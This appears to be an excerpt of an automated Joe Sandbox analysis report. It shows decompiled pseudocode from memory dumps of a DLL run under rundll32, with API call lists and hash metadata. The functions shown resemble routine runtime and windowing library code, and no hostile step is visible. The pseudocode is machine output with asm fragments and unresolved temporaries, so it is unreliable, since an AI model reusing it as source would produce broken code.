                                                                                                            									do {
                                                                                                            										E1001B6FB( &_v20);
                                                                                                            										_t164 = _t164 - 1;
                                                                                                            										__eflags = _t164;
                                                                                                            									} while (_t164 != 0);
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t59 = _t152 + 1; // 0xcd
                                                                                                            							_t139 = _t59;
                                                                                                            							__eflags = _t139;
                                                                                                            							_t99 =  &(_t131[2]);
                                                                                                            							_v52 = _t99;
                                                                                                            							if(_t139 > 0) {
                                                                                                            								_a12 = _t139;
                                                                                                            								do {
                                                                                                            									asm("movsd");
                                                                                                            									asm("movsd");
                                                                                                            									asm("movsd");
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									E1001B66F(__eflags,  &_v20,  &_v44);
                                                                                                            									E1001B6CD( &_v20);
                                                                                                            									_t166 = _t166 + 0x14;
                                                                                                            									_v52 =  &(_v52[0]);
                                                                                                            									_t74 =  &_a12;
                                                                                                            									 *_t74 = _a12 - 1;
                                                                                                            									__eflags =  *_t74;
                                                                                                            									 *_v52 = _v9 + 0x30;
                                                                                                            									_v9 = 0;
                                                                                                            								} while ( *_t74 != 0);
                                                                                                            								_t99 = _v52;
                                                                                                            							}
                                                                                                            							_t100 = _t99 - 1;
                                                                                                            							_t101 = _t100 - 1;
                                                                                                            							__eflags =  *_t100 - 0x35;
                                                                                                            							_t141 =  &(_t131[2]);
                                                                                                            							if( *_t100 < 0x35) {
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t101 - _t141;
                                                                                                            									if(_t101 < _t141) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									__eflags =  *_t101 - 0x30;
                                                                                                            									if( *_t101 == 0x30) {
                                                                                                            										_t101 = _t101 - 1;
                                                                                                            										__eflags = _t101;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								__eflags = _t101 - _t141;
                                                                                                            								if(_t101 >= _t141) {
                                                                                                            									goto L46;
                                                                                                            								} else {
                                                                                                            									 *_t141 = 0x30;
                                                                                                            									goto L54;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								while(1) {
                                                                                                            									__eflags = _t101 - _t141;
                                                                                                            									if(_t101 < _t141) {
                                                                                                            										break;
                                                                                                            									}
                                                                                                            									__eflags =  *_t101 - 0x39;
                                                                                                            									if( *_t101 == 0x39) {
                                                                                                            										 *_t101 = 0x30;
                                                                                                            										_t101 = _t101 - 1;
                                                                                                            										__eflags = _t101;
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								__eflags = _t101 - _t141;
                                                                                                            								if(_t101 < _t141) {
                                                                                                            									_t101 = _t101 + 1;
                                                                                                            									 *_t131 =  *_t131 + 1;
                                                                                                            									__eflags =  *_t131;
                                                                                                            								}
                                                                                                            								 *_t101 =  *_t101 + 1;
                                                                                                            								__eflags =  *_t101;
                                                                                                            								L46:
                                                                                                            								_t103 = _t101 - _t131 - 3;
                                                                                                            								__eflags = _t103;
                                                                                                            								_t131[1] = _t103;
                                                                                                            								 *((char*)( &(_t131[2]) + _t103)) = 0;
                                                                                                            								goto L47;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t152 = _t152 + _t159;
                                                                                                            							__eflags = _t152;
                                                                                                            							if(_t152 > 0) {
                                                                                                            								goto L27;
                                                                                                            							} else {
                                                                                                            								goto L26;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						 *_t131 = 1;
                                                                                                            						if(_t151 != 0x80000000 || _a4 != 0) {
                                                                                                            							if((_t151 & 0x40000000) != 0) {
                                                                                                            								goto L11;
                                                                                                            							} else {
                                                                                                            								_push("1#SNAN");
                                                                                                            								goto L21;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							L11:
                                                                                                            							__eflags = _t133;
                                                                                                            							if(_t133 == 0) {
                                                                                                            								L15:
                                                                                                            								__eflags = _t151 - 0x80000000;
                                                                                                            								if(_t151 != 0x80000000) {
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									__eflags = _a4;
                                                                                                            									if(_a4 != 0) {
                                                                                                            										goto L20;
                                                                                                            									} else {
                                                                                                            										_push("1#INF");
                                                                                                            										goto L18;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								__eflags = _t151 - 0xc0000000;
                                                                                                            								if(_t151 != 0xc0000000) {
                                                                                                            									goto L15;
                                                                                                            								} else {
                                                                                                            									__eflags = _a4;
                                                                                                            									if(_a4 != 0) {
                                                                                                            										L20:
                                                                                                            										_push("1#QNAN");
                                                                                                            										L21:
                                                                                                            										_push( &(_t131[2]));
                                                                                                            										E10017B90();
                                                                                                            										_t131[1] = 6;
                                                                                                            									} else {
                                                                                                            										_push("1#IND");
                                                                                                            										L18:
                                                                                                            										_push( &(_t131[2]));
                                                                                                            										E10017B90();
                                                                                                            										_t131[1] = 5;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_v48 = _v48 & 0x00000000;
                                                                                                            						L47:
                                                                                                            						_t105 = _v48;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L26:
                                                                                                            					_t131[2] = 0x30;
                                                                                                            					L54:
                                                                                                            					 *_t131 =  *_t131 & 0x00000000;
                                                                                                            					_t131[1] = 0x20;
                                                                                                            					_t131[1] = 1;
                                                                                                            					_t131[2] = 0;
                                                                                                            					_t105 = 1;
                                                                                                            				}
                                                                                                            				return E100117AE(_t105, _v8);
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___shr_12
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                            • API String ID: 2664560246-4131533671
                                                                                                            • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                                                            • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1002DA8D(intOrPtr __ecx, void* __edx) {
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t60;
                                                                                                            				signed char _t65;
                                                                                                            				signed int _t70;
                                                                                                            				signed int _t71;
                                                                                                            				intOrPtr _t109;
                                                                                                            				signed int _t115;
                                                                                                            				signed int _t117;
                                                                                                            				void* _t133;
                                                                                                            				void* _t135;
                                                                                                            				intOrPtr _t140;
                                                                                                            				void* _t143;
                                                                                                            				void* _t145;
                                                                                                            
                                                                                                            				_t133 = __edx;
                                                                                                            				_t143 = _t145 - 0xa8;
                                                                                                            				_t60 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                                                            				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
                                                                                                            				_t109 = __ecx;
                                                                                                            				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
                                                                                                            				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
                                                                                                            					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
                                                                                                            						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
                                                                                                            					}
                                                                                                            					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
                                                                                                            					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
                                                                                                            					 *(_t109 + 0x7c) = _t65;
                                                                                                            					if((_t65 & 0x00000040) == 0) {
                                                                                                            						_push(0x104);
                                                                                                            						_push(_t143 - 0x60);
                                                                                                            						E1002095F(_t140);
                                                                                                            						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
                                                                                                            					}
                                                                                                            					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
                                                                                                            					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
                                                                                                            						_t71 = _t70 & 0xfffffffe;
                                                                                                            					} else {
                                                                                                            						_t71 = _t70 | 0x00000001;
                                                                                                            					}
                                                                                                            					E100383D0(_t140, _t71);
                                                                                                            					_push(0xffffffff);
                                                                                                            					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
                                                                                                            					if(_t135 > 0) {
                                                                                                            						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
                                                                                                            					}
                                                                                                            					if( *(_t143 + 0xb4) == 0) {
                                                                                                            						if(_t135 < 1) {
                                                                                                            							_t137 = _t109 + 0x94;
                                                                                                            							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
                                                                                                            							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
                                                                                                            						}
                                                                                                            						_t115 =  *0x1004efa4; // 0x2
                                                                                                            						_push(0x115);
                                                                                                            						_push(0);
                                                                                                            						_push(0);
                                                                                                            						_push( ~_t115);
                                                                                                            						_t117 =  *0x1004efa0; // 0x2
                                                                                                            						_push( ~_t117);
                                                                                                            						_push(0);
                                                                                                            					} else {
                                                                                                            						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
                                                                                                            						E10028E5A(_t109, _t143 - 0x70);
                                                                                                            						if(_t135 < 1) {
                                                                                                            							asm("cdq");
                                                                                                            							asm("cdq");
                                                                                                            							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
                                                                                                            							_push( *((intOrPtr*)(_t143 + 0xb0)));
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							asm("movsd");
                                                                                                            							E1002CE2A(_t109);
                                                                                                            							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
                                                                                                            						}
                                                                                                            						_push(0x114);
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
                                                                                                            						_push( *((intOrPtr*)(_t143 - 0x6c)));
                                                                                                            						_push( *(_t143 - 0x70));
                                                                                                            						_push(0);
                                                                                                            					}
                                                                                                            					E100204FE(_t140);
                                                                                                            					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
                                                                                                            						E1000870E(_t140, _t109);
                                                                                                            					}
                                                                                                            					_t120 =  *((intOrPtr*)(_t140 + 0x88));
                                                                                                            					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
                                                                                                            						E1002D1B2(_t120, _t140, 0xffffffff, 0);
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
                                                                                                            					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
                                                                                                            				}
                                                                                                            				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
                                                                                                            			}


















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$CopyCtrlEqualParentWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2544134605-2766056989
                                                                                                            • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                                                            • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10021B92(intOrPtr* __ecx, signed int _a4) {
                                                                                                            				struct HWND__* _v4;
                                                                                                            				struct tagMSG* _v8;
                                                                                                            				int _v12;
                                                                                                            				int _v16;
                                                                                                            				struct HWND__* _t42;
                                                                                                            				signed int _t45;
                                                                                                            				int _t53;
                                                                                                            				long _t56;
                                                                                                            				int _t62;
                                                                                                            				intOrPtr* _t69;
                                                                                                            
                                                                                                            				_t62 = 1;
                                                                                                            				_t69 = __ecx;
                                                                                                            				_v12 = 1;
                                                                                                            				_v16 = 0;
                                                                                                            				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
                                                                                                            					_t62 = 0;
                                                                                                            				}
                                                                                                            				_t42 = GetParent( *(_t69 + 0x1c));
                                                                                                            				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
                                                                                                            				_v4 = _t42;
                                                                                                            				_v8 = E1001F7B7();
                                                                                                            				L14:
                                                                                                            				while(1) {
                                                                                                            					L14:
                                                                                                            					while(_v12 != 0) {
                                                                                                            						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                            							while(1) {
                                                                                                            								L15:
                                                                                                            								_t45 = E1001FABB();
                                                                                                            								if(_t45 == 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								if(_t62 != 0) {
                                                                                                            									_t53 = _v8->message;
                                                                                                            									if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                            										E100203AD(_t69, 1);
                                                                                                            										UpdateWindow( *(_t69 + 0x1c));
                                                                                                            										_t62 = 0;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
                                                                                                            									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
                                                                                                            									return  *((intOrPtr*)(_t69 + 0x40));
                                                                                                            								} else {
                                                                                                            									if(E1001FA27(_v8) != 0) {
                                                                                                            										_v12 = 1;
                                                                                                            										_v16 = 0;
                                                                                                            									}
                                                                                                            									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                            										continue;
                                                                                                            									} else {
                                                                                                            										goto L14;
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_push(0);
                                                                                                            							E1003A098();
                                                                                                            							return _t45 | 0xffffffff;
                                                                                                            						}
                                                                                                            						if(_t62 != 0) {
                                                                                                            							E100203AD(_t69, 1);
                                                                                                            							UpdateWindow( *(_t69 + 0x1c));
                                                                                                            							_t62 = 0;
                                                                                                            						}
                                                                                                            						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
                                                                                                            							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
                                                                                                            						}
                                                                                                            						if((_a4 & 0x00000002) != 0) {
                                                                                                            							L13:
                                                                                                            							_v12 = 0;
                                                                                                            							continue;
                                                                                                            						} else {
                                                                                                            							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
                                                                                                            							_v16 = _v16 + 1;
                                                                                                            							if(_t56 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L15;
                                                                                                            				}
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10021BC0
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C01
                                                                                                            • SendMessageA.USER32(?,00000121,00000000,?), ref: 10021C25
                                                                                                            • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 10021C3F
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C85
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                                                            • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E1000943B(void* __ecx) {
                                                                                                            				intOrPtr _t54;
                                                                                                            				intOrPtr _t56;
                                                                                                            				signed int _t72;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t79;
                                                                                                            				void* _t81;
                                                                                                            				void* _t85;
                                                                                                            				void* _t100;
                                                                                                            				void* _t101;
                                                                                                            				void* _t103;
                                                                                                            				signed int _t106;
                                                                                                            				intOrPtr* _t107;
                                                                                                            				void* _t109;
                                                                                                            				void* _t111;
                                                                                                            				void* _t112;
                                                                                                            
                                                                                                            				E10011BF0(0x1003add7, _t109);
                                                                                                            				_t112 = _t111 - 0x80;
                                                                                                            				_t54 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
                                                                                                            				_t101 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
                                                                                                            				 *((intOrPtr*)(_t109 - 0x50)) = 0;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
                                                                                                            				_t56 =  *((intOrPtr*)(_t109 + 8));
                                                                                                            				 *(_t109 - 4) = 0;
                                                                                                            				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
                                                                                                            					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
                                                                                                            						_t56 = _t109 - 0x54;
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t101 + 0x60)) = 0;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L6:
                                                                                                            					_t13 = _t56 + 4; // 0x10009a67
                                                                                                            					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
                                                                                                            					 *(_t109 - 0x78) = 0x20;
                                                                                                            					_t105 = lstrlenA(_t109 - 0x30) + 1;
                                                                                                            					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
                                                                                                            					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
                                                                                                            					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
                                                                                                            					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
                                                                                                            					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
                                                                                                            					_t72 =  *(_t109 - 0x4c);
                                                                                                            					__eflags = _t72;
                                                                                                            					_t106 = _t72;
                                                                                                            					if(_t72 < 0) {
                                                                                                            						_t106 =  ~_t72;
                                                                                                            					}
                                                                                                            					E10029194(_t109 - 0x8c);
                                                                                                            					 *(_t109 - 4) = 1;
                                                                                                            					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
                                                                                                            					asm("cdq");
                                                                                                            					_t107 = _t101 + 0x60;
                                                                                                            					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
                                                                                                            					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
                                                                                                            					E1003881B(_t107);
                                                                                                            					_t79 = _t109 - 0x78;
                                                                                                            					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
                                                                                                            					__eflags = _t79;
                                                                                                            					if(__eflags < 0) {
                                                                                                            						 *_t107 = 0;
                                                                                                            					}
                                                                                                            					 *(_t109 - 4) = 0;
                                                                                                            					E100291EF(_t109 - 0x8c, __eflags);
                                                                                                            				}
                                                                                                            				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
                                                                                                            				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
                                                                                                            				_t81 = E100293B4(_t109 - 0x54);
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
                                                                                                            				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
                                                                                                            			}


















                                                                                                            0x10009523
                                                                                                            0x10009530
                                                                                                            0x10009534
                                                                                                            0x10009544
                                                                                                            0x10009547
                                                                                                            0x1000954b
                                                                                                            0x1000954e
                                                                                                            0x10009551
                                                                                                            0x1000955c
                                                                                                            0x10009560
                                                                                                            0x10009566
                                                                                                            0x10009568
                                                                                                            0x1000956a
                                                                                                            0x1000956a
                                                                                                            0x10009572
                                                                                                            0x10009575
                                                                                                            0x10009575
                                                                                                            0x1000957a
                                                                                                            0x10009581
                                                                                                            0x10009588
                                                                                                            0x10009596
                                                                                                            0x100095a9

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009440
                                                                                                            • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4082312370-3916222277
                                                                                                            • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                                                            • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                            				struct _CRITICAL_SECTION* _v8;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t32;
                                                                                                            				void* _t36;
                                                                                                            				void* _t37;
                                                                                                            				signed int _t52;
                                                                                                            				long* _t59;
                                                                                                            				struct _CRITICAL_SECTION* _t62;
                                                                                                            				void* _t64;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t59 = __ecx;
                                                                                                            				_t1 =  &(_t59[7]); // 0x1004f010
                                                                                                            				_t62 = _t1;
                                                                                                            				_v8 = _t62;
                                                                                                            				EnterCriticalSection(_t62);
                                                                                                            				_t32 = _a4;
                                                                                                            				if(_t32 <= 0) {
                                                                                                            					L20:
                                                                                                            					LeaveCriticalSection(_t62);
                                                                                                            				} else {
                                                                                                            					_t4 =  &(_t59[3]); // 0x3
                                                                                                            					if(_t32 >=  *_t4) {
                                                                                                            						goto L20;
                                                                                                            					} else {
                                                                                                            						_t64 = TlsGetValue( *_t59);
                                                                                                            						if(_t64 == 0) {
                                                                                                            							if(E1003741E(0x10) == 0) {
                                                                                                            								_t64 = 0;
                                                                                                            							} else {
                                                                                                            								_t64 = E10037684(_t34);
                                                                                                            							}
                                                                                                            							 *(_t64 + 8) = 0;
                                                                                                            							 *(_t64 + 0xc) = 0;
                                                                                                            							_t10 =  &(_t59[5]); // 0x30f0ba0
                                                                                                            							_t49 =  *_t10;
                                                                                                            							_t11 =  &(_t59[6]); // 0x4
                                                                                                            							 *(_t64 +  *_t11) =  *_t10;
                                                                                                            							_t59[5] = _t64;
                                                                                                            							goto L10;
                                                                                                            						} else {
                                                                                                            							_t52 = _a4;
                                                                                                            							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
                                                                                                            								L10:
                                                                                                            								_t36 =  *(_t64 + 0xc);
                                                                                                            								if(_t36 != 0) {
                                                                                                            									_t16 =  &(_t59[3]); // 0x3
                                                                                                            									_t49 =  *_t16 << 2;
                                                                                                            									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
                                                                                                            								} else {
                                                                                                            									_t15 =  &(_t59[3]); // 0x3
                                                                                                            									_t37 = LocalAlloc(0,  *_t15 << 2);
                                                                                                            								}
                                                                                                            								if(_t37 == 0) {
                                                                                                            									LeaveCriticalSection(_v8);
                                                                                                            									_t37 = E1001CE3B(_t49);
                                                                                                            								}
                                                                                                            								 *(_t64 + 0xc) = _t37;
                                                                                                            								_t20 =  &(_t59[3]); // 0x3
                                                                                                            								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
                                                                                                            								_t23 =  &(_t59[3]); // 0x3
                                                                                                            								 *(_t64 + 8) =  *_t23;
                                                                                                            								TlsSetValue( *_t59, _t64);
                                                                                                            								_t52 = _a4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t32 =  *(_t64 + 0xc);
                                                                                                            						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
                                                                                                            							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
                                                                                                            						}
                                                                                                            						LeaveCriticalSection(_v8);
